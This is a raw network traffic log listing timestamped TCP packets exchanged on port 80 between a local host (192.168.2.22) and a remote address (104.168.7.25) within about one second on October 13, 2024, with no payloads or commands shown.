Oct 13, 2024 07:28:59.995203018 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995203972 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995203972 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995465994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995485067 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995507956 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995522022 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995522022 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995528936 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995543957 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995548010 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995565891 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995573997 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995584965 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995599031 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995630026 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995630980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995635986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995659113 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.995692015 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.995692015 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996366024 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996387005 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996406078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996423006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996423006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996428967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996443987 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996450901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996462107 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996474028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996485949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996493101 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996516943 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996517897 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996537924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996540070 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996558905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996563911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.996577024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.996607065 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997370005 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997416973 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997433901 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997451067 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997457981 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997484922 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997495890 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997534990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997535944 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997570038 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997582912 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997602940 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997606993 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997633934 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997647047 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997668028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997675896 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997675896 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997700930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.997705936 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997749090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.997749090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998198986 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998231888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998250961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998270035 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998281956 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998315096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998332024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998349905 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998362064 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998383999 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998392105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998415947 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998430014 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998449087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998455048 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998481989 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998492002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998514891 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.998533010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.998553991 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999058962 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999067068 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999100924 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999119997 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999133110 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999147892 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999166012 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999177933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999197960 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999217987 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999232054 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999238014 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999263048 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999277115 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999295950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999315023 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999326944 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999336004 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999358892 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999377012 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999408007 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999413013 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999461889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999916077 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999948025 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999967098 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.999979973 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.999985933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000022888 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000030994 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000062943 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000077009 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000096083 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000119925 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000129938 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000142097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000164032 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000179052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000193119 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000209093 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000226021 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000238895 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000260115 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000272989 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000314951 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000842094 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000874043 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000891924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000916958 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000925064 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000940084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000957966 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.000968933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.000991106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001008034 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001024008 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001030922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001055002 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001071930 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001089096 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001096010 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001123905 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001137018 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001157045 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001168013 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001205921 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001687050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001718998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001739979 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001750946 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001759052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001784086 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001796007 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001816034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001835108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001847982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001857042 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001878977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001895905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001912117 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001926899 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001945019 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001961946 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.001977921 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.001986027 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002010107 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002023935 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002042055 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002068996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002068996 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002089977 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002624989 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002657890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002681017 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002691984 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002700090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002723932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002754927 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002787113 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002790928 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002790928 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002790928 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002819061 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002823114 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002851963 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002866983 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002883911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002901077 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002916098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002923012 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002948046 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002962112 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.002981901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.002993107 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.003015041 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.003029108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.003066063 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.084889889 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.084978104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085011959 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085062981 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085067034 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085067987 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085067987 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085094929 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085133076 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085140944 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085141897 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085166931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085201025 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085221052 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085222006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085237026 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085247993 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085287094 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085383892 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085416079 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085448027 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085480928 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085513115 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085545063 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085546970 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085547924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085547924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085547924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085547924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085580111 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085630894 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085630894 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.085892916 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085925102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085956097 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.085987091 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086097002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086097002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086097002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086097002 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086261034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086292982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086314917 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086325884 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086342096 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086358070 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086366892 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086390972 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086410046 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086421967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086431980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086453915 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086472988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086487055 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086497068 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086520910 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086544991 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086554050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086564064 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086587906 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086599112 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086637974 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.086638927 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.086683989 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087021112 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087022066 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087069988 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087163925 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087198019 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087210894 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087229967 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087235928 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087264061 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087280035 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087296009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087301016 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087330103 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087344885 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087362051 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087376118 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087408066 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087424040 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087455988 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087474108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087488890 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087506056 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087524891 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.087529898 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.087572098 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088361979 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088395119 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088418961 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088444948 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088458061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088479042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088496923 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088510990 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088521004 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088546038 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088558912 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088586092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088593960 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088623047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088639021 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088655949 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088677883 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088690042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088699102 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088722944 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088740110 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088757038 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088776112 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088789940 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.088798046 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.088836908 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089082003 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089117050 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089134932 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089148998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089157104 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089181900 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089195013 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089215040 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089232922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089250088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089252949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089282990 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089299917 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089317083 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089327097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089348078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:29:00.089368105 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:29:00.089380026 CEST	80	49161	104.168.7.25	192.168.2.22
